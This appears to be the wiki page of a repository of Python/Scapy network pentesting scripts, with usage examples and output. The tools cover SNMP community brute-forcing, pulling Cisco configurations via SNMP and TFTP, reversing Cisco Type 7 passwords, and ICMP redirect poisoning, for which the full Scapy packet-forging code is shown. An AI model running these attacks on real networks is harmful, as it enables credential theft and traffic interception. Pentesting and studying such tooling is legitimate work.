-
Notifications
You must be signed in to change notification settings - Fork 7
Home
This repository contains some scripts that can be usefull for Network administration/pentesting. Most of these scripts are written in Python2, and are based on Scapy.
After gaining access to the network, this script allows to collect domain information given by DHCP.
# ./dhcp_discover.py -i wlan0 -I- Sending packet... -I- Got response : -I- Source : xx:xx:xx:xx:xx:xx -I- Destination : xx:xx:xx:xx:xx:xx -I- message-type : 2 -I- server_id : 192.168.1.1 -I- lease_time : 86043 -I- subnet_mask : 255.255.255.0 -I- router : 192.168.1.1 -I- name_server : 8.8.8.8 -I- domain : P0WN3D
This file contains a home-made dissector for CDP. When run as a script, it monitors network traffic, and stops when a CDP packet is discovered. It dissects the packet and print information in a human readable format:
# ./CDP.py DeviceID: p0wn3d Port: FastEthernet0/1 VLAN 10 Management Address: 192.168.1.254
This script, based on snmp_login Metasploit module, brute forces the SNMP community names.
First, a set of SNMP GET request using versionOID is performed to capture the community names. Then, based on the results, these community names are used to read, then write back the nameOID. Based on the response status, the community is marked as RW or RO.
[+] Community private, version 1, for 192.168.1.254 is RW [+] Community private, version 2c, for 192.168.1.254 is RW
This bash script can be used to remotly download the configuration file of a Cisco equipement. The RW community name must be known.
./dlCiscoCfg -i eth0 -v 1 -c private 192.168.1.254 -I- Starting tftpd server on 192.168.1.242. Results will be stored in /srv/tftp. -I- Retrieve 192.168.1.254 configuration in switch-config.txt_192.168.1.254. -I- SNMP Version: 1 -I- Community: private SNMPv2-SMI::enterprises.9.2.1.55.192.168.1.242 = STRING: "switch-config.txt_192.168.1.254" -I- Stopping tftp server.
This scripts starts the HPA TFTP server on the local machine and issues a snmp request (using snmpset) to start the download of configuration file of the remote Cisco equipement on the local machine.
Once the configuration collected, some password, stored in Cisco Type 7 format, can be retrieved as clear-text password.
First compile it:
gcc -o cisco_type7 cisco_type7.c
Then use it to reverse Cisco Type 7 password :
./cisco_type7 01375717585B C1sc0
Note that this tool can be used to encode a clear text password in Cisco type 7 format:
./cisco_type7 -e C1sc0 01375717585B
This script performs ICMPRedirect attacks. It send ICMP redirect packets on the gateway behalf. The script will not execute if packet forwarding is deactivated.
# ./ICMPRedirect.py -g 192.168.1.254 -t 192.168.252 -E- Forwarding deactivated. Please enable it: sudo sysctl -w net.ipv4.ip_forward=1 # sysctl -w net.ipv4.ip_forward=1 net.ipv4.ip_forward = 1
The -v options displays the Scapy code (nice to put in a pentest report :) )
>>> gw = '192.168.1.254' >>> target = '192.168.252' >>> ip = IP() >>> ip.src = gw >>> ip.dst = target >>> ip.show2() ###[ IP ]### version = 4L ihl = 5L tos = 0x0 len = 20 id = 1 flags = frag = 0L ttl = 64 proto = ip chksum = 0xf69e src = 192.168.1.254 dst = 192.168.0.252 \options \ >>> icmp = ICMP() >>> icmp.type = 5 >>> icmp.code = 1 >>> icmp.gw = get_if_addr(iface) >>> icmp.show2() ###[ ICMP ]### type = redirect code = host-redirect chksum = 0x388e gw = 192.168.1.200 >>> ip2 = IP() >>> ip2.src = target >>> ip2.dst = gw >>> ip2.show() ###[ IP ]### version = 4L ihl = 5L tos = 0x0 len = 20 id = 1 flags = frag = 0L ttl = 64 proto = ip chksum = 0xf69e src = 192.168.0.252 dst = 192.168.1.254 \options \ >>> send(ip/icmp/ip2/UDP(), loop=1, inter=2) -I- Start poisonning... ...^C -I- Ended poison